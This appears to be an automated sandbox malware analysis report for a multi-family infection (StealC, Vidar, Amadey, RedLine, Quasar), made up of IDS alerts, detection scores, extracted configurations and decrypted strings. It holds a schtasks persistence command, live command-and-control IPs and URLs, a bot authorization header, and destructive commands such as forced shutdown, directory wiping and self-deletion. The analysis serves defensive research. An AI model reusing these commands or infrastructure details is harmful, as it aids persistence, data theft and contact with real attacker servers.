                                Source: Process startedAuthor: Joe Security: Data: Command: "schtasks" /create /SC MINUTE /MO 1 /TN "svchost" /tr "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" /rl HIGHEST /f, CommandLine: "schtasks" /create /SC MINUTE /MO 1 /TN "svchost" /tr "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe", ParentImage: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, ParentProcessId: 2020, ParentProcessName: FRaqbC8wSA1XvpFVjCRGryWt.exe, ProcessCommandLine: "schtasks" /create /SC MINUTE /MO 1 /TN "svchost" /tr "C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe" /rl HIGHEST /f, ProcessId: 2700, ProcessName: schtasks.exe
                                Timestamp:07/13/24-07:07:04.553234
                                SID:2051828
                                Source Port:80
                                Destination Port:58981
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:07:00.456748
                                SID:2044623
                                Source Port:58978
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:06:08.592536
                                SID:2043234
                                Source Port:8970
                                Destination Port:49710
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:06:32.660417
                                SID:2044623
                                Source Port:58973
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:07:04.736461
                                SID:2051831
                                Source Port:80
                                Destination Port:58981
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:07:03.747294
                                SID:2044243
                                Source Port:58981
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:07:03.629036
                                SID:2044696
                                Source Port:58980
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:07:07.333581
                                SID:2044696
                                Source Port:58983
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:06:19.054947
                                SID:2043231
                                Source Port:49710
                                Destination Port:8970
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:06:13.939319
                                SID:2046056
                                Source Port:8970
                                Destination Port:49710
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:06:08.398513
                                SID:2046045
                                Source Port:49710
                                Destination Port:8970
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:07:04.374384
                                SID:2044244
                                Source Port:58981
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:07:04.555587
                                SID:2044246
                                Source Port:58981
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:06:01.501384
                                SID:2856147
                                Source Port:49704
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:06:02.494732
                                SID:2856122
                                Source Port:80
                                Destination Port:49704
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:07/13/24-07:06:04.782188
                                SID:2044696
                                Source Port:49705
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: mlk3kK6uLZ.exeAvira: detected
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeAvira: detection malicious, Label: TR/AD.RedLineSteal.zwufg
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                                Source: 00000014.00000002.2813138912.00000000032D7000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://85.28.47.70/570d5d5e8678366c.php"}
                                Source: 00000012.00000002.2679727829.000000006C3A3000.00000004.00000001.01000000.00000014.sdmpMalware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.70/570d5d5e8678366c.php"}
                                Source: 22.0.Freshbuild.exe.870000.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "185.172.128.116/Mb3GvQs8/index.php", "Version": "4.30"}
                                Source: 5.2.RegAsm.exe.436040.0.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.172.128.33:8970"], "Bot Id": "@LOGSCLOUDYT_BOT", "Authorization Header": "3b888690d495b9792a58ef1c36d35d19"}
                                Source: 42.2.svchost.exe.1b0000.0.unpackMalware Configuration Extractor: Quasar {"Version": "1.4.0", "Host:Port": "45.66.231.158:45764;", "SubDirectory": "Microsoft Windows", "InstallName": "svchost.exe", "MutexName": "80038a66-0dbb-4135-8eb1-4ce5a34ce41b", "StartupKey": "svchost", "Tag": "Proxy", "LogDirectoryName": "svchostetw", "ServerSignature": "DBA8F0Br++WlVnwMY+TOW3OLUcEzXGeCEpOjr8WUkG+2zCAq/kjzFN0ynUG7fVZJ2WnLgRMFCsnq+tQUyVRlD2d5OlDSd/89AGgSVE2v9+GKNyc798YKw+I8C5fQOSMPFpDgKf5dKMZdCkGYH88RdlMVn+P2IZysmei7aIdaN6ozqMBSJ3dYDd32Gz/nEv0PfLO8IH2gEmckMn0ox5+a1nQqWprOyOIvEwmwXM4zUb60JA3vXdZgUOqa8bXTE61J00WpLHW7n+ovTcw9xf6BrZayMnbNSF4c43JzJg8GPjLxCYEz4+4yc+T8TMveGuOTcMBoF6oh/rl43wMyyUWF6AqFMjQumJfK27M9e/Wt6/eym/Ny3Os3EA4F8rQjOEXaXg1n6VwK673sq38YoOFcOxJoBi7dwGCJ4nzNfFDgie/wOGhfen9yfDxk9+TXmKq2vsVjbElYLuFTnj/97F0vhIy6r4GoJyckl6ueQ89BUx5BJZuxY+Ne9C7v0qRhPNAasRpGjp/+Z9bQOvzTJKp1qFsQjtBRVxBycTB1ot1jg1jEBnZ/Iz+gT1GqQTeJ0vvsFjJcm7PwI3lJ+lzd9fhixiWe77RTDl8B4sDgf6+1WkUd//2uAnhNIJt81NkDMmmpjYbygCBOnGGY4qyqKgDsTtS+QZS1vUCgN8VZTlofKZY=", "ServerCertificate": "MIIE9DCCAtygAwIBAgIQAMfljgRljIw8eG6/KAHpETANBgkqhkiG9w0BAQ0FADAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMCAXDTI0MDcwOTE5MTA0OFoYDzk5OTkxMjMxMjM1OTU5WjAbMRkwFwYDVQQDDBBRdWFzYXIgU2VydmVyIENBMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAhkNgzYkaEwf7PBmR34/tzDkjeq0EJR6st02BJKB6Pn0eymJW5ztCKBjJWcj7ostsw1a8yLjTRhlPG2yTbAptsqGR7yW4Vx5EcTnJN1gnpbsHwMV0Nt46dJUsXGzDmSnMeazOYj9kusu/ppQkNYizfvV4De9PrDSyr/buwR4wWMZ/VpIW4LYCSKfrR/MhCV+RoWrr9hEYAw239t3sCQxo1aXlje5PyfqMXfjsHpecZazN08hwj3Rt08LVr3X8PZAn+mEqltOhyp+dEbQYK8S/2DYVp5OrTrRSrbY8cl06nAKMAPXobfLQ1yn9CnlwMUyV+B7GU0wWCK0JsUrfczniucg4bAGnQY+fAwnmM4LT/5T6wZlBgJABkyRW02Vi7vKtU+FQTpBq7lWVZIc5zJXgavwJl+WF7xwdNG/aiDItl2gZ7AqhS6zXo6+jmYUt1Tz5NgVjxtEZPEZ3SmMWYIYmBN4De8cP6wdv70w0csE65l3eyOpTf6Ez24x14kqk+dBzn3DH/wSSW6Y3XY/Fx3TL596pw+rOCD9OQx5SkYwEm39k3LZxvPSkbXrGTemBi12Khp23CypLECFMNYooDz+/5pLVwrRqkXEqaHYpeQ3F0uYlJwzlWVGZRtSg1vKkfrsR3f9/zaEvwMhhjx/xf+qXBvHkqEav9yJKYF8FI+Vf0jcCAwEAAaMyMDAwHQYDVR0OBBYEFPZB8zAaPEqcMz49Nz1nOdAlp926MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQENBQADggIBAAAxAkkSUk3Kt0Auf6XkCxIqotC09vm7t3YkEiQXeEA6YUTSBorR9g1WMAqxBQys9A5TFGUEOukXrVVpTljXKiWo5FzVptTd+dXTgu+KmhVEOobIaAiXvyccvRZcv6b/+bvG6Mag7bU8+hxwMHpne2DbOHO9ediM8FPK0uNEvQbYjJczQEOzJBdUQt4tNEn9vzJNH5a4JF1MJ0FAYR7B7gjuC+7jgFIrjioNyWfF0WktB38DGWxYKwl5kvq0KoZdwrNPlm2cceBnf9fHSyvRjfCbQXZ+voLsp2O9QAKYxy3zrLGsLZ313jI0h9pwySVxI+Pv7LYcBnJbg6843wjV3Sp13KUJDn944Nzxkwy76VOTCtb+/lZg3xZ5H1c1AlHlP0WqfpQV+L97HOO+PYBDKNGfU/ZcsQfUdWfboIueM85bxeIIjbhIn471OrVUCs13j67bSGtZkhpuhd2jyfiEU5koRWFPQZjEt7vbfAHFRh6mnFk1B4Jm7yZK3VHd360QFwEc6EKxQ18kh6TEK15D7l+/oUd3uIOM/WqkQzfW2QVkL943vW1pzaobeM3lcoOXVMV1dFnyXOi8/u/0++oc9vRjwLY6RvHGGqjTIWRsO1ULsoaMi7o9NtHE+vfDYe+f3+4TYlBB7Z+WpQc6lCqgFk/aZnoR0tYWs2gd1G23+691"}
                                Source: bflow-musico.funVirustotal: Detection: 12%Perma Link
                                Source: foodbook.liveVirustotal: Detection: 13%Perma Link
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\leg222[1].exeReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\leg222[1].exeVirustotal: Detection: 82%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeReversingLabs: Detection: 91%
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeVirustotal: Detection: 82%Perma Link
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeReversingLabs: Detection: 63%
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeVirustotal: Detection: 71%Perma Link
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeReversingLabs: Detection: 71%
                                Source: C:\Users\user\AppData\Roaming\VP2pdCInvS.exeVirustotal: Detection: 82%Perma Link
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeReversingLabs: Detection: 63%
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeVirustotal: Detection: 44%Perma Link
                                Source: mlk3kK6uLZ.exeReversingLabs: Detection: 63%
                                Source: mlk3kK6uLZ.exeVirustotal: Detection: 71%Perma Link
                                Source: Yara matchFile source: 42.2.svchost.exe.1b0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 38.2.FRaqbC8wSA1XvpFVjCRGryWt.exe.f60000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000002A.00000002.4452302176.00000000001B2000.00000040.00000001.01000000.00000020.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000002A.00000003.4159859843.0000000005800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000002.4134787389.0000000000F62000.00000040.00000001.01000000.0000001F.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000026.00000003.4083127627.0000000005770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: FRaqbC8wSA1XvpFVjCRGryWt.exe PID: 2020, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1772, type: MEMORYSTR
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                Source: C:\Users\user\AppData\Local\Temp\1000160001\leg222.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\leg222[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Roaming\Z73fDV6g4L.exeJoe Sandbox ML: detected
                                Source: mlk3kK6uLZ.exeJoe Sandbox ML: detected
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: 185.172.128.116
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: /Mb3GvQs8/index.php
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: S-%lu-
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: b66a8ae076
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: Hkbsse.exe
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: Startup
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: cmd /C RMDIR /s/q
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: rundll32
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: Programs
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: %USERPROFILE%
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: cred.dll|clip.dll|
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: http://
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: https://
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: /Plugins/
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: &unit=
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: shell32.dll
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: kernel32.dll
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: GetNativeSystemInfo
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: ProgramData\
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: AVAST Software
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: Kaspersky Lab
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: Panda Security
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: Doctor Web
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: 360TotalSecurity
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: Bitdefender
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: Norton
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: Sophos
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: Comodo
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: WinDefender
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: 0123456789
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: ------
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: ?scr=1
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: ComputerName
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: -unicode-
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: VideoID
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: DefaultSettings.XResolution
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: DefaultSettings.YResolution
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: ProductName
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: CurrentBuild
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: rundll32.exe
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: "taskkill /f /im "
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: " && timeout 1 && del
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: && Exit"
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: " && ren
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: Powershell.exe
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: -executionpolicy remotesigned -File "
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: shutdown -s -t 0
                                Source: 22.0.Freshbuild.exe.870000.0.unpackString decryptor: random
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: INSERT_KEY_HERE
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetProcAddress
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: LoadLibraryA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: lstrcatA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: OpenEventA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CreateEventA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CloseHandle
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Sleep
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetUserDefaultLangID
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: VirtualAllocExNuma
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: VirtualFree
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetSystemInfo
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: VirtualAlloc
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: HeapAlloc
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetComputerNameA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: lstrcpyA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetProcessHeap
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetCurrentProcess
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: lstrlenA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: ExitProcess
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GlobalMemoryStatusEx
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetSystemTime
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SystemTimeToFileTime
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: advapi32.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: gdi32.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: user32.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: crypt32.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: ntdll.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetUserNameA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CreateDCA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetDeviceCaps
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: ReleaseDC
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CryptStringToBinaryA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: sscanf
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: VMwareVMware
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: HAL9TH
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: JohnDoe
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: DISPLAY
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: %hu/%hu/%hu
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: http://85.28.47.70
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: /570d5d5e8678366c.php
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: /663cea891445d733/
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: hello
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetEnvironmentVariableA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetFileAttributesA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GlobalLock
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: HeapFree
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetFileSize
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GlobalSize
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CreateToolhelp32Snapshot
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: IsWow64Process
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Process32Next
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetLocalTime
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: FreeLibrary
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetTimeZoneInformation
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetSystemPowerStatus
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetVolumeInformationA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetWindowsDirectoryA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: Process32First
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetLocaleInfoA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetUserDefaultLocaleName
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetModuleFileNameA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: DeleteFileA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: FindNextFileA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: LocalFree
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: FindClose
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SetEnvironmentVariableA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: LocalAlloc
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetFileSizeEx
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: ReadFile
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SetFilePointer
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: WriteFile
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CreateFileA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: FindFirstFileA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CopyFileA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: VirtualProtect
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetLogicalProcessorInformationEx
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetLastError
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: lstrcpynA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: MultiByteToWideChar
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GlobalFree
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: WideCharToMultiByte
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GlobalAlloc
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: OpenProcess
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: TerminateProcess
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetCurrentProcessId
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: gdiplus.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: ole32.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: bcrypt.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: wininet.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: shlwapi.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: shell32.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: psapi.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: rstrtmgr.dll
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CreateCompatibleBitmap
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: SelectObject
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: BitBlt
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: DeleteObject
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CreateCompatibleDC
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GdipGetImageEncodersSize
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GdipGetImageEncoders
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GdipCreateBitmapFromHBITMAP
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GdiplusStartup
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GdiplusShutdown
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GdipSaveImageToStream
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GdipDisposeImage
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GdipFree
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetHGlobalFromStream
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CreateStreamOnHGlobal
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CoUninitialize
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CoInitialize
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CoCreateInstance
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: BCryptGenerateSymmetricKey
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: BCryptCloseAlgorithmProvider
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: BCryptDecrypt
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: BCryptSetProperty
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: BCryptDestroyKey
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: BCryptOpenAlgorithmProvider
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetWindowRect
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetDesktopWindow
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetDC
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CloseWindow
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: wsprintfA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: EnumDisplayDevicesA
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: GetKeyboardLayoutList
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: CharToOemW
                                Source: 18.2.hello.exe.6c3a3000.4.raw.unpackString decryptor: wsprintfW
